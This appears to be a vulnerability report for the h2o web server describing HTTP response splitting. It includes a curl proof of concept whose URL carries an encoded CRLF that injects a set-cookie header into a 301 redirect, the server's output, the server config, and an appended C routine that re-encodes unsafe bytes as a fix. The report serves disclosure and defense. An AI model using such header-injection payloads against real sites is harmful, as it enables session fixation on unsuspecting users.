Closed
Description
Hi,
I found out that I can do HTTP response splitting in h2o by feeding the URL with carriage return
and new line (CRLF). Example:
```
$ curl -I "http://fooexample.com/en/%0d%0aset-cookie:test=test"
HTTP/1.1 301 Redirected
Date: Thu, 07 Jan 2016 08:56:34 GMT
Server: h2o/1.6.0
Connection: keep-alive
location: https://fooexample.com/en/
set-cookie:test=test
content-type: text/html; charset=utf-8
```
The h2o config:

```yaml
hosts:
  "fooexample.com":
    listen:
      port: 80
    paths:
      "/":
        redirect:
          status: 301
          url: https://fooexample.com/
  "fooexample.com":
    listen:
      port: 443
      ssl:
        certificate-file: /path/to/fooexample.crt
        key-file: /path/to/fooexample.key
```
This issue could lead to a session fixation attack, where an attacker could coerce a victim
into clicking a link with an injected predefined cookie.
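
An added example, not part of the original report and not h2o's code: one way a redirect handler can build the `location` value so that a decoded CR/LF in the request path is re-encoded instead of ending the header line. The names `build_location` and `is_safe_uri_byte` are hypothetical, and the input is constructed from the request shown in the report.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: may this byte be copied verbatim into a Location value? */
static int is_safe_uri_byte(unsigned char c)
{
    if (c <= 0x20 || c >= 0x7f)
        return 0; /* control bytes (including CR and LF), space, DEL, non-ASCII */
    return strchr("\"<>\\^`{|}%", c) == NULL; /* '%' is re-encoded: path is already decoded */
}

/* Appends the percent-decoded request path to the redirect prefix, re-encoding
 * every unsafe byte. Returns the length written, or -1 if dst is too small. */
int build_location(char *dst, size_t cap, const char *prefix,
                   const char *path, size_t path_len)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t n = strlen(prefix), i;

    if (n >= cap)
        return -1;
    memcpy(dst, prefix, n);
    for (i = 0; i < path_len; i++) {
        unsigned char c = (unsigned char)path[i];
        if (is_safe_uri_byte(c)) {
            if (n + 1 >= cap)
                return -1;
            dst[n++] = (char)c;
        } else {
            if (n + 3 >= cap)
                return -1;
            dst[n++] = '%';
            dst[n++] = hex[c >> 4];
            dst[n++] = hex[c & 15];
        }
    }
    dst[n] = '\0';
    return (int)n;
}

int main(void)
{
    /* Constructed input: decoded path of the report's request, without the leading "/" */
    const char path[] = "en/\r\nset-cookie:test=test";
    char loc[256];

    if (build_location(loc, sizeof loc, "https://fooexample.com/", path, sizeof path - 1) < 0)
        return 1;
    printf("location: %s\n", loc);
    return 0;
}
```

With this encoding the injected text stays inside the single `location` line as `%0D%0Aset-cookie:test=test` rather than appearing as a separate `set-cookie` header.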